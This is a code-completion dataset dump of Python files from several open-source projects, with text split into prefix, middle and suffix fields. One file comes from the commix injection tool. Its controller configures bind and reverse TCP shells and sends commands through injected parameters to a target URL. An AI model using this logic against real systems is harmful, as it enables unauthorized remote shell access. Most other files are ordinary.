repo_name
stringlengths 5
100
| path
stringlengths 4
231
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 6
947k
| score
float64 0
0.34
| prefix
stringlengths 0
8.16k
| middle
stringlengths 3
512
| suffix
stringlengths 0
8.17k
|
|---|---|---|---|---|---|---|---|---|
edublancas/learning
|
quizzes/Scheduler.py
|
Python
|
mit
| 100
| 0.03
|
#This cl
|
ass helps to create reminders for quizzes
#based on the last quiz date and score performance
| |
mrunge/openstack_horizon
|
openstack_horizon/dashboards/admin/aggregates/forms.py
|
Python
|
apache-2.0
| 2,793
| 0
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
from django.utils.translation import ugettext_lazy as _
from horizon_lib import exceptions
from horizon_lib import forms
from horizon_lib import messages
from openstack_horizon import api
from openstack_horizon.dashboards.admin.aggregates import constants
INDEX_URL = constants.AGGREGATES_INDEX_URL
class UpdateAggregateForm(forms.SelfHandlingForm):
name = forms.CharField(label=_("Name"),
max_length=255)
availability_zone = forms.CharField(label=_("Availability Zone"),
max_length=255)
def __init__(self, request, *args, **kwargs):
super(UpdateAggregateForm, self).__init__(request, *args, **kwargs)
def handle(self, request, data):
id = self.initial['id']
name = data['name']
availability_zone = data['availability_zone']
aggregate = {'name': name}
if availability_zone:
aggregate['availability_zone'] = availability_zone
try:
api.nova.aggregate_update(request, id, aggregate)
message = (_('Successfully updated aggregate: "%s."')
% data['name'])
messages.success(request, message)
except Exception:
exceptions.handle(request,
_('Unable to update the aggregate.'))
return True
class UpdateMetadataForm(forms.SelfHandlingForm):
def handle(self, request, data):
id = self.initial['id']
old_metadata = self.initial['metadata']
try:
new_metadata = json.loads(self.data['metadata'])
metadata = dict(
(item['key'], str(item['value']))
for item in new_metadata
)
for key in old_metadata:
if key not in metadata:
metadata[key] = Non
|
e
api.nova.aggregate_set_metadata(request, id, metadata)
message = _('Metadata successfully updated.')
messages.success(request,
|
message)
except Exception:
msg = _('Unable to update the aggregate metadata.')
exceptions.handle(request, msg)
return False
return True
|
alex-ip/geophys2netcdf
|
geophys2netcdf/metadata/_template_metadata.py
|
Python
|
apache-2.0
| 1,884
| 0.009554
|
'''
Created on 20Jan.,2017
@author: Alex Ip
'''
import re
import json
from _metadata import Metadata
class TemplateMetadata(Metadata):
"""Subclass of Metadata to manage template metadata
"""
# Class variable holding metadata type string
_metadata_type_id = 'Template'
_filename_pattern = '.*\.json$' # Default RegEx for finding metadata file.
def __init__(self, source, metadata_object=None):
self._metadata_dict = {}
|
self.metadata_object = None
template_json_file = open(source)
self.template
|
= {str(key): str(value) for key, value in json.load(template_json_file).iteritems()} # Convert from unicode
template_json_file.close()
# Find all elements in templates
element_set = set()
for attribute_text in self.template.values():
for s in re.finditer('%%(.+?)%%', attribute_text):
element_set.add(s.group(1))
self.key_value_dict = {element: None for element in element_set}
if metadata_object:
self.update_text(metadata_object)
def update_text(self, metadata_object):
self.metadata_object = metadata_object
# Update metadata dict from metadata object
for element in self.key_value_dict.keys():
self.key_value_dict[element] = metadata_object.get_metadata(element.split('/')) or 'UNKNOWN'
for attribute_name, attribute_text in self.template.iteritems():
for s in re.finditer('%%(.+?)%%', attribute_text):
element = s.group(1)
attribute_text = attribute_text.replace('%%' + element + '%%', str(self.key_value_dict[element]))
self._metadata_dict[attribute_name.upper()] = attribute_text
|
smalley/cfapi
|
migrations/versions/4b2b7cde821f_add_org_name_to_search.py
|
Python
|
mit
| 2,641
| 0.006816
|
""" Adds organization name to the project search tsv
Revision ID: 4b2b7cde821f
Revises: 15593ff6a15f
Create Date: 2015-11-30 17:21:56.928359
"""
# revision identifiers, used by Alembic.
revision = '4b2b7cde821f'
down_revision = '15593ff6a15f'
from alembic import op
import sqlalchemy as sa
def upgrade():
droptrigger = "DROP TRIGGER IF EXISTS tsvupdate_projects_trigger ON project"
droptriggerfunc = "DROP FUNCTION IF EXISTS project_search_trigger()"
createtriggerfunc = '''
CREATE FUNCTION project_search_trigger() RETURNS trigger AS $$
begin
new.tsv_body :=
setweight(to_tsvector('pg_catalog.english', coalesce(new.status,'')), 'A') ||
setweight(to_tsvector('pg_catalog.english', coalesce(new.tags,'')), 'A') ||
setweight(to_tsvector('pg_catalog.english', coalesce(new.name,'')), 'B') ||
setweight(to_tsvector('pg_catalog.english', coalesce(new.description,'')), 'B') ||
setweight(to_tsvector('pg_catalog.english', coalesce(new.languages,'')), 'A') ||
setweight(to_tsvector('pg_catalog.english', coalesce(new.organization_name,'')), 'A');
return new;
end
$$ LANGUAGE plpgsql;
'''
createtrigger = "CREATE TRIGGER tsvupdate_projects_trigger BEFORE INSERT OR UPDATE ON project FOR EACH ROW EXECUTE PROCEDURE project_search_trigger();"
op.execute(droptrigger)
op.execute(droptriggerfunc)
op.execute(createtriggerfunc)
op.execute(createtrigger)
def downgrade():
droptrigger = "DROP TRIGGER IF EXISTS tsvupdate_projects_trigger ON project"
droptriggerfunc = "DROP FUNCTION IF EXISTS project_search_
|
trigger()"
createtriggerfunc = '''
CREATE FUNCTION project_search_trigger() RETURNS trigger AS $$
begin
new.tsv_body :=
setweight(to_tsvector('pg_catalog.english', coalesce(new.st
|
atus,'')), 'A') ||
setweight(to_tsvector('pg_catalog.english', coalesce(new.tags,'')), 'A') ||
setweight(to_tsvector('pg_catalog.english', coalesce(new.name,'')), 'B') ||
setweight(to_tsvector('pg_catalog.english', coalesce(new.description,'')), 'B') ||
setweight(to_tsvector('pg_catalog.english', coalesce(new.languages,'')), 'A');
return new;
end
$$ LANGUAGE plpgsql;
'''
createtrigger = "CREATE TRIGGER tsvupdate_projects_trigger BEFORE INSERT OR UPDATE ON project FOR EACH ROW EXECUTE PROCEDURE project_search_trigger();"
op.execute(droptrigger)
op.execute(droptriggerfunc)
op.execute(createtriggerfunc)
op.execute(createtrigger)
|
cmouse/buildbot
|
master/buildbot/test/unit/process/test_buildrequest.py
|
Python
|
gpl-2.0
| 28,617
| 0.001433
|
# This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
import datetime
import mock
from twisted.internet import defer
from twisted.trial import unittest
from buildbot.process import buildrequest
from buildbot.process.builder import Builder
from buildbot.test import fakedb
from buildbot.test.fake import fakemaster
from buildbot.test.util.misc import TestReactorMixin
class TestBuildRequestCollapser(TestReactorMixin, unittest.TestCase):
@defer.inlineCallbacks
def setUp(self):
self.setUpTestReactor()
self.master = fakemaster.make_master(self, wantData=True, wantDb=True)
self.master.botmaster = mock.Mock(name='botmaster')
self.master.botmaster.builders = {}
self.builders = {}
self.bldr = yield self.createBuilder('A', builderid=77)
@defer.inlineCallbacks
def createBuilder(self, name, builderid=None):
if builderid is None:
b = fakedb.Builder(name=name)
yield self.master.db.insertTestData([b])
builderid = b.id
bldr = mock.Mock(name=name)
bldr.name = name
bldr.master = self.master
self.master.botmaster.builders[name] = bldr
self.builders[name] = bldr
bldr.getCollapseRequestsFn = lambda: False
return bldr
def tearDown(self):
pass
@defer.inlineCallbacks
def do_request_collapse(self, rows, brids, exp):
yield self.master.db.insertTestData(rows)
brCollapser = buildrequest.BuildRequestCollapser(self.master, brids)
self.assertEqual(exp, (yield brCollapser.collapse()))
def test_collapseRequests_no_other_request(self):
def collapseRequests_fn(master, builder, brdict1, brdict2):
# Allow all requests
self.fail("Should never be called")
return True
self.bldr.getCollapseRequestsFn = lambda: collapseRequests_fn
rows = [
fakedb.Builder(id=77, name='A'),
fakedb.SourceStamp(id=234, codebase='A'),
fakedb.Change(changeid=14, codebase='A', sourcestampid=234),
fakedb.Buildset(id=30, reason='foo',
submitted_at=1300305712, results=-1),
fakedb.BuildsetSourceStamp(sourcestampid=234, buildsetid=30),
fakedb.BuildRequest(id=19, buildsetid=30, builderid=77,
priority=13, submitted_at=1300305712, results=-1),
]
return self.do_request_collapse(rows, [19], [])
BASE_ROWS = [
fakedb.Builder(id=77, name='A'),
fakedb.SourceStamp(id=234, codebase='C'),
fakedb.Buildset(id=30, reason='foo',
submitted_at=1300305712, results=-1),
fakedb.BuildsetSourceStamp(sourcestampid=234, buildsetid=30),
fakedb.SourceStamp(id=235, codebase='C'),
fakedb.Buildset(id=31, reason='foo',
submitted_at=1300305712, results=-1),
fakedb.BuildsetSourceStamp(sourcestampid=235, buildsetid=31),
fakedb.SourceStamp(id=236, codebase='C'),
fakedb.Buildset(id=32, reason='foo',
submitted_at=1300305712, results=-1),
fakedb.BuildsetSourceStamp(sourcestampid=236, buildsetid=32),
fakedb.BuildRequest(id=19, buildsetid=30, builderid=77,
priority=13, submitted_at=1300305712, results=-1),
fakedb.BuildRequest(id=20, buildsetid=31, builderid=77,
priority=13, submitted_at=1300305712, results=-1),
fakedb.BuildRequest(id=21, buildsetid=32, builderid=77,
priority=13, submitted_at=1300305712, results=-1),
]
def test_collapseRequests_no_collapse(self):
def collapseRequests_fn(master, builder, brdict1, brdict2):
# Fail all collapse attempts
return False
self.bldr.getCollapseRequestsFn = lambda: collapseRequests_fn
return self.do_request_collapse(self.BASE_ROWS, [21], [])
def test_collapseRequests_collapse_all(self):
def collapseRequests_fn(master, builder, brdict1, brdict2):
# collapse all attempts
return True
self.bldr.getCollapseRequestsFn = lambda: collapseRequests_fn
return self.do_request_collapse(self.BASE_ROWS, [21], [19, 20])
def test_collapseRequests_collapse_all_duplicates(self):
def collapseRequests_fn(master, builder, brdict1, brdict2):
# collapse all attempts
return True
self.bldr.getCollapseRequestsFn = lambda: collapseRequests_fn
return self.do_request_collapse(self.BASE_ROWS, [21, 21], [19, 20])
# As documented:
# Sourcestamps are compatible if all of the below conditions are met:
#
# * Their codebase, branch, project, and repository attributes match exactly
# * Neither source stamp has a patch (e.g., from a try scheduler)
# * Either both source stamps are associated with changes, or neither are associated with
# changes but they have matching revisions.
def makeBuildRequestRows(self, brid, bsid, changeid, ssid, codebase, branch=None,
project=None, repository=None, patchid=None, revision=None):
rows = [
fakedb.SourceStamp(id=ssid, codebase=codebase, branch=branch,
project=project, repository=repository, patchid=patchid,
revision=revision),
fakedb.Buildset(id=bsid, reason='foo',
submitted_at=1300305712, results=-1),
fakedb.BuildsetSourceStamp(sourcestampid=ssid, buildsetid=bsid),
fakedb.BuildRequest(id=brid, buildsetid=bsid, builderid=77,
priority=13, submitted_at=1300305712, results=-1),
]
if changeid:
rows.append(
fakedb.Change(changeid=changeid, branch='trunk', revision='9283',
repository='svn://...', project='world-domination',
sourcestampid=ssid)
)
if patchid:
rows.append(
fakedb.Patch(id=patchid, patch_base64='aGVsbG8sIHdvcmxk',
patch_author='bar', patch_comment='foo', subdir='/foo',
patchlevel=3))
return rows
@defer.inlineCallbacks
def test_collapseRequests_collapse_default_with_codebases(self):
def collapseRequests_fn(master, builder, brdict1, brdict2):
return bu
|
ildrequest.BuildRequest.canBeCollapsed(builder.master, brdict1, brdict2)
rows = [
fakedb.Builder(id=77, name='A'),
]
rows += self.makeBuildRequestRows(22, 122, None, 222, 'A')
rows += self.makeBuildRequestRows(21, 121, None, 221, 'C')
rows += self.makeBuildRequestRows(19, 119, None, 210, '
|
C')
rows += self.makeBuildRequestRows(20, 120, None, 220, 'C')
self.bldr.getCollapseRequestsFn = lambda: Builder._defaultCollapseRequestFn
yield self.do_request_collapse(rows, [22], [])
yield self.do_request_collapse(rows, [21], [19, 20])
@defer.inlineCallbacks
def test_collapseRequests_collapse_default_with_codebases_branches(self):
def collapseRequests_fn(master, builder, brdict1, brdict2):
return buildrequest.BuildRequest.canBeCollapsed(builder.master, brdict1, brdict2)
rows = [
fakedb.Builder(id=77, name='A'),
]
rows += self.makeBuildRequestR
|
danielbair/aeneas
|
aeneas/tests/test_cew.py
|
Python
|
agpl-3.0
| 3,056
| 0.001963
|
#!/usr/bin/env python
# coding=utf-8
# aeneas is a Python/C library and a set of tools
# to automagically synchronize audio and text (aka forced alignment)
#
# Copyright (C) 2012-2013, Alberto Pettarin (www.albertopettarin.it)
# Copyright (C) 2013-2015, ReadBeyond Srl (www.readbeyond.it)
# Copyright (C) 2015-2017, Alberto Pettarin (www.albertopettarin.it)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import unittest
import aeneas.globalfunctions as gf
class TestCEW(unittest.TestCase):
def test_cew_synthesize_multiple(self):
handler, output_file_path = gf.tmp_file(suffix=".wav")
try:
c_quit_after = 0.0
c_backwards = 0
c_text = [
(u"en", u"Dummy 1"), # NOTE cew requires the actual eSpeak voice code
(u"en", u"Dummy 2"), # NOTE cew requires the actual eSpeak voice code
(u"en", u"Dummy 3"), # NOTE cew requires the actual eSpeak voice code
]
import aeneas.cew.cew
sr, sf, intervals = aeneas.cew.cew.synthesize_multiple(
output_file_path,
c_quit_after,
c_backwards,
c_text
)
self.assertEqua
|
l(sr, 22050)
self.assertEqual(sf, 3)
self.assertEqual(len(intervals), 3)
except ImportError:
pass
gf.delete_file(handler, output_file_path)
def test_cew_synthesize_multiple_lang(self):
handler, output_file_path = gf.tmp_file(suffix=".wav")
try:
c_quit_after = 0.0
c_backwards = 0
c_tex
|
t = [
(u"en", u"Dummy 1"), # NOTE cew requires the actual eSpeak voice code
(u"it", u"Segnaposto 2"), # NOTE cew requires the actual eSpeak voice code
(u"en", u"Dummy 3"), # NOTE cew requires the actual eSpeak voice code
]
import aeneas.cew.cew
sr, sf, intervals = aeneas.cew.cew.synthesize_multiple(
output_file_path,
c_quit_after,
c_backwards,
c_text
)
self.assertEqual(sr, 22050)
self.assertEqual(sf, 3)
self.assertEqual(len(intervals), 3)
except ImportError:
pass
gf.delete_file(handler, output_file_path)
if __name__ == "__main__":
unittest.main()
|
hackersql/sq1map
|
comm1x/src/core/injections/controller/shell_options.py
|
Python
|
gpl-3.0
| 8,306
| 0.013003
|
#!/usr/bin/env python
# encoding: UTF-8
"""
This file is part of Commix Project (http://commixproject.com).
Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst).
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
For more see the file 'readme/COPYING' for copying permission.
"""
import re
import os
import sys
import time
import urllib
import urlparse
from src.utils import menu
from src.utils import settings
from src.core.injections.controller import checks
from src.thirdparty.colorama import Fore, Back, Style, init
from src.core.shells import bind_tcp
from src.core.shells import reverse_tcp
from src.core.injections.results_based.techniques.classic import cb_injector
from src.core.injections.results_based.techniques.eval_based import eb_injector
from src.core.injections.semiblind.techniques.file_based import fb_injector
"""
Check for established connection
"""
def check_established_connection():
while True:
if settings.VERBOSITY_LEVEL == 1:
print ""
warn_msg = "Something went wrong with the reverse TCP connection."
warn_msg += " Please wait while checking state."
print settings.print_warning_msg(warn_msg)
time.sleep(10)
lines = os.popen('netstat -anta').read().split("\n")
found = False
for line in lines:
if "ESTABLISHED" in line and settings.LPORT in line.split():
found = True
pass
if not found:
return
"""
Execute the bind / reverse TCP shell
"""
def execute_shell(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, payload, OUTPUT_TEXTFILE):
if settings.EVAL_BASED_STATE != False:
# Command execution results.
start = time.time()
response = eb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename)
end = time.time()
diff = end - start
# Evaluate injection results.
shell = eb_injector.injection_results(response, TAG, cmd)
else:
# Command execution results.
start = time.time()
if settings.FILE_BASED_STATE == True:
response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
else:
whitespace = settings.WHITESPACE[0]
if whitespace == " ":
whitespace = urllib.quote(whitespace)
response = cb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename)
end = time.time()
diff = end - start
# Evaluate injection results.
shell = cb_injector.injection_results(response, TAG, cmd)
if settings.REVERSE_TCP and (int(diff) > 0 and int(diff) < 6):
check_established_connection()
else:
if settings.VERBOSITY_LEVEL == 1:
print ""
err_msg = "The " + os_shell_option.split("_")[0] + " "
err_msg += os_shell_option.split("_")[1].upper() + " connection has failed!"
print settings.print_critical_msg(err_msg)
"""
Configure the bind TCP shell
"""
def bind_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again, payload, OUTPUT_TEXTFILE):
settings.BIND_TCP = True
# Set up RHOST / LPORT for the bind TCP connection.
bind_tcp.configure_bind_tcp()
if settings.BIND_TCP == False:
if settings.REVERSE_TCP == True:
os_shell_option = "reverse_tcp"
reverse_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again, payload, OUTPUT_TEXTFILE)
return go_back, go_back_again
while True:
if settings.RHOST and settings.LPORT in settings.SHELL_OPTIONS:
result = checks.check_bind_tcp_options(settings.RHOST)
else:
cmd = bind_tcp.bind_tcp_options()
result = checks.check_bind_tcp_options(cmd)
if result != None:
if result == 0:
go_back_again = False
elif result == 1 or result == 2:
go_back_again = True
settings.BIND_TCP = False
elif result == 3:
settings.BIND_TCP = False
reverse_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again, payload, OUTPUT_TEXTFILE)
return go_back, go_back_again
# execute bind TCP shell
execute_shell(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, payload, OUTPUT_TEXTFILE)
"""
Configure the reverse TCP shell
"""
def reverse_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again, payload, OUTPUT_TEXTFILE):
settings.REVERSE_TCP = True
# Set up LHOST / LPORT for the reverse TCP connection.
reverse_tcp.configure_reverse_tcp()
if settings.REVERSE_TCP == False:
if settings.BIND_TCP == True:
os_shell_option = "bind_tcp"
bind_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again, payload, OUTPUT_TEXTFILE)
return go_back, go_back_again
while True:
if settings.LHOST and settings.LPORT in settings.SHELL_OPTIONS:
result = checks.check_reverse_tcp_options(settings.LHOST)
else:
cmd = reverse_tcp.reverse_tcp_options()
result = checks.check_reverse_tcp_options(cmd)
if result != None:
if result == 0:
go_back_again = False
elif result == 1 or result == 2:
go_back_again = True
settings.REVERSE_TCP = False
elif result == 3:
settings.REVERSE_TCP = False
bind_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again, payload, OUTPUT_TEXTFILE)
#reverse_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again)
return go_back, go_back_again
# execute reverse TCP shell
execute_shell(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, payload, OUTPUT_TEXTFILE)
"""
Check commix shell options
"""
def check_option(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, technique, go_back, no_result, timesec, go_back_again, payload, OUTPUT_TEXTFILE):
os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result)
if os_shell_option == "back" or os_shell_option == True or os_shell_option == False:
go_back = True
if os_shell_option == False:
go_back_again = True
return go_back, go_back_again
# The "os_shell" option
elif os_shell_option == "os_shell":
warn_msg = "You are already i
|
nto the '" + os_shell_option + "' mode."
print settings.print_warning_msg(warn_msg)
return go_back, go_back_again
# The "bind_tcp" option
elif os_shell_option == "bind_tcp":
go_back, go_back_again = bind_t
|
cp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again, payload, OUTPUT_TEXTFILE)
return go_back, go_back_again
# The "reverse_tcp" option
elif os_shell_option == "reverse_tcp":
go_back, go_back_again = reverse_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again, payload, OUTPUT_TEXTFILE)
return go_back, go_back_again
# The "q
|
yelley/sssd
|
src/config/SSSDConfigTest.py
|
Python
|
gpl-3.0
| 71,503
| 0.001566
|
#!/usr/bin/python
'''
Created on Sep 18, 2009
@author: sgallagh
'''
import unittest
import os
from stat import *
import sys
srcdir = os.getenv('srcdir')
if srcdir:
sys.path.append("./src/config")
srcdir = srcdir + "/src/config"
else:
srcdir = "."
import SSSDConfig
class SSSDConfigTestValid(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def testServices(self):
sssdconfig = SSSDConfig.SSSDConfig(srcdir + "/etc/sssd.api.conf",
srcdir + "/etc/sssd.api.d")
sssdconfig.import_config(srcdir + "/testconfigs/sssd-valid.conf")
# Validate services
services = sssdconfig.list_services()
self.assertTrue('sssd' in services)
self.assertTrue('nss' in services)
self.assertTrue('pam' in services)
#Verify service attributes
sssd_service = sssdconfig.get_service('sssd')
service_opts = sssd_service.list_options()
self.assertTrue('services' in service_opts.keys())
service_list = sssd_service.get_option('services')
self.assertTrue('nss' in service_list)
self.assertTrue('pam' in service_list)
self.assertTrue('domains' in service_opts)
self.assertTrue('reconnection_retries' in service_opts)
del sssdconfig
sssdconfig = SSSDConfig.SSSDConfig(srcdir + "/etc/sssd.api.conf",
srcdir + "/etc/sssd.api.d")
sssdconfig.new_config()
sssdconfig.delete_service('sssd')
new_sssd_service = sssdconfig.new_service('sssd');
new_options = new_sssd_service.list_options();
self.assertTrue('debug_level' in new_options)
self.assertEquals(new_options['debug_level'][0], int)
self.assertTrue('command' in new_options)
self.assertEquals(new_options['command'][0], str)
self.assertTrue('reconnection_retries' in new_options)
self.assertEquals(new_options['reconnection_retries'][0], int)
self.assertTrue('services' in new_options)
self.assertEquals(new_options['debug_level'][0], int)
self.assertTrue('domains' in new_options)
self.assertEquals(new_options['domains'][0], list)
self.assertEquals(new_options['domains'][1], str)
self.assertTrue('sbus_timeout' in new_options)
self.assertEquals(new_options['sbus_timeout'][0], int)
self.assertTrue('re_expression' in new_options)
self.assertEquals(new_options['re_expression'][0], str)
self.assertTrue('full_name_format' in new_options)
self.assertEquals(new_options['full_name_format'][0], str)
self.assertTrue('default_domain_suffix' in new_options)
self.assertEquals(new_options['default_domain_suffix'][0], str)
del sssdconfig
def testDomains(self):
sssdconfig = SSSDConfig.SSSDConfig(srcdir + "/etc/sssd.api.conf",
srcdir + "/etc/sssd.api.d")
sssdconfig.import_config(srcdir + "/testconfigs/sssd-valid.conf")
#Validate domain list
domains = sssdconfig.list_domains()
self.assertTrue('LOCAL' in domains)
self.assertTrue('LDAP' in domains)
self.assertTrue('PROXY' in domains)
self.assertTrue('IPA' in domains)
#Verify domain attributes
ipa_domain = sssdconfig.get_domain('IPA')
domain_opts = ipa_domain.list_options()
self.assertTrue('debug_level' in domain_opts.keys())
self.assertTrue('id_provider' in domain_opts.keys())
self.assertTrue('auth_provider' in domain_opts.keys())
del sssdconfig
def testListProviders(self):
sssdconfig = SSSDConfig.SSSDConfig(srcdir + "/etc/sssd.api.conf",
srcdir + "/etc/sssd.api.d")
sssdconfig.new_config()
junk_domain = sssdconfig.new_domain('junk')
providers = junk_domain.list_providers()
self.assertTrue('ldap' in providers.keys())
def testCreateNewLocalConfig(self):
sssdconfig = SSSDConfig.SSSDConfig(srcdir + "/etc/sssd.api.conf",
srcdir + "/etc/sssd.api.d")
sssdconfig.new_config()
local_domain = sssdconfig.new_domain('LOCAL')
local_domain.add_provider('local', 'id')
local_domain.set_option('debug_level', 1)
local_domain.set_option('default_shell', '/bin/tcsh')
local_domain.set_active(True)
sssdconfig.save_domain(local_domain)
of = '/tmp/testCreateNewLocalConfig.conf'
#Ensure the output file doesn't exist
try:
os.unlink(of)
except:
pass
#Write out the file
sssdconfig.write(of)
#Verify that the output file has the correct permissions
mode = os.stat(of)[ST_MODE]
#Output files should not be readable or writable by
#non-owners, and should not be executable by anyone
self.assertFalse(S_IMODE(mode) & 0177)
#Remove the output file
os.unlink(of)
def testCreateNewLDAPConfig(self):
sssdconfig = SSSDConfig.SSSDConfig(srcdir + "/etc/sssd.api.conf",
srcdir + "/etc/sssd.api.d")
sssdconfig.new_config()
ldap_domain = sssdconfig.new_domain('LDAP')
ldap_domain.add_provider('ldap', 'id')
ldap_domain.set_option('debug_level', 1)
ldap_domain.set_active(True)
sssdconfig.save_domain(ldap_domain)
of = '/tmp/testCreateNewLDAPConfig.conf'
#Ensure the output file doesn't exist
try:
os.unlink(of)
except:
pass
#Write out the file
sssdconfig.write(of)
#Verify that the output file has the correct permissions
mode = os.stat(of)[ST_MODE]
#Output files should not be readable or writable by
#non-owners, and should not be executable by anyone
self.assertFalse(S_IMODE(mode) & 0177)
#Remove the output file
os.unlink(of)
def testModifyExistingConfig(self):
sssdconfig = SSSDConfig.SSSDConfig(srcdir + "/etc/sssd.api.conf",
srcdir + "/etc/sssd.api.d")
sssdconfig
|
.import_config(srcdir + "/testconfigs/sssd-valid.conf")
ldap_domain = sssdconfig.get_domain('LDAP')
ldap_domain.set_option('debug_level', 3)
ldap_domain.remove_provider('auth')
ldap_domain.add_pr
|
ovider('krb5', 'auth')
ldap_domain.set_active(True)
sssdconfig.save_domain(ldap_domain)
of = '/tmp/testModifyExistingConfig.conf'
#Ensure the output file doesn't exist
try:
os.unlink(of)
except:
pass
#Write out the file
sssdconfig.write(of)
#Verify that the output file has the correct permissions
mode = os.stat(of)[ST_MODE]
#Output files should not be readable or writable by
#non-owners, and should not be executable by anyone
self.assertFalse(S_IMODE(mode) & 0177)
#Remove the output file
os.unlink(of)
def testSpaces(self):
sssdconfig = SSSDConfig.SSSDConfig(srcdir + "/etc/sssd.api.conf",
srcdir + "/etc/sssd.api.d")
sssdconfig.import_config(srcdir + "/testconfigs/sssd-valid.conf")
ldap_domain = sssdconfig.get_domain('LDAP')
self.assertEqual(ldap_domain.get_option('auth_provider'), 'ldap')
self.assertEqual(ldap_domain.get_option('id_provider'), 'ldap')
class SSSDConfigTestInvalid(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def testBadBool(self):
sssdconfig = SSSDConfig.SSSDConfig(srcdir + "/etc/sssd.api.conf",
srcdir + "/etc/sssd.api.d")
sssdconfig.import_config(srcdir + "/testconfigs/sssd-invalid-badbool.conf")
self.assertRaises(TypeError,
sssdconfig.get_domain,'IPA')
class SSSDConfigTestSSSDService(unittest.TestCase):
def setUp(self):
self.schema = SSSDConfig.SSSDConfigSche
|
reinaH/osf.io
|
website/routes.py
|
Python
|
apache-2.0
| 47,853
| 0.001526
|
# -*- coding: utf-8 -*-
import os
import httplib as http
from flask import request
from flask import send_from_directory
from framework import status
from framework import sentry
from framework.auth import cas
from framework.routing import Rule
from framework.flask import redirect
from framework.sessions import session
from framework.routing import WebRenderer
from framework.exceptions import HTTPError
from framework.auth import get_display_name
from framework.routing import xml_renderer
from framework.routing import json_renderer
from framework.routing import process_rules
from framework.auth import views as auth_views
from framework.routing import render_mako_string
from framework.auth.core import _get_current_user
from website import util
from website import settings
from website import language
from website.util import paths
from website.util import sanitize
from website import landing_pages as landing_page_views
from website import views as website_views
from website.citations import views as citation_views
from website.search import views as search_views
from website.oauth import views as oauth_views
from website.profile import views as profile_views
from website.project import views as project_views
from website.addons.base import views as addon_views
from website.discovery import views as discovery_views
from website.conferences import views as conference_views
from website.notifications import views as notification_views
def get_globals():
"""Context variables that are available for every template rendered by
OSFWebRenderer.
"""
user = _get_current_user()
return {
'user_name': user.username if user else '',
'user_full_name': user.fullname if user else '',
'user_id': user._primary_key if user else '',
'user_url': user.url if user else '',
'user_gravatar': profile_views.current_user_gravatar(size=25)['gravatar_url'] if user else '',
'user_api_url': user.api_url if user else '',
'display_name': get_display_name(user.fullname) if user else '',
'use_cdn': settings.USE_CDN_FOR_CLIENT_LIBS,
'piwik_host': settings.PIWIK_HOST,
'piwik_site_id': settings.PIWIK_SITE_ID,
'sentry_dsn_js': settings.SENTRY_DSN_JS if sentry.enabled else None,
'dev_mode': settings.DEV_MODE,
'allow_login': settings.ALLOW_LOGIN,
'cookie_name': settings.COOKIE_NAME,
'status': status.pop_status_messages(),
'domain': settings.DOMAIN,
'disk_saving_mode': settings.DISK_SAVING_MODE,
'language': language,
'web_url_for': util.web_url_for,
'api_url_for': util.api_url_for,
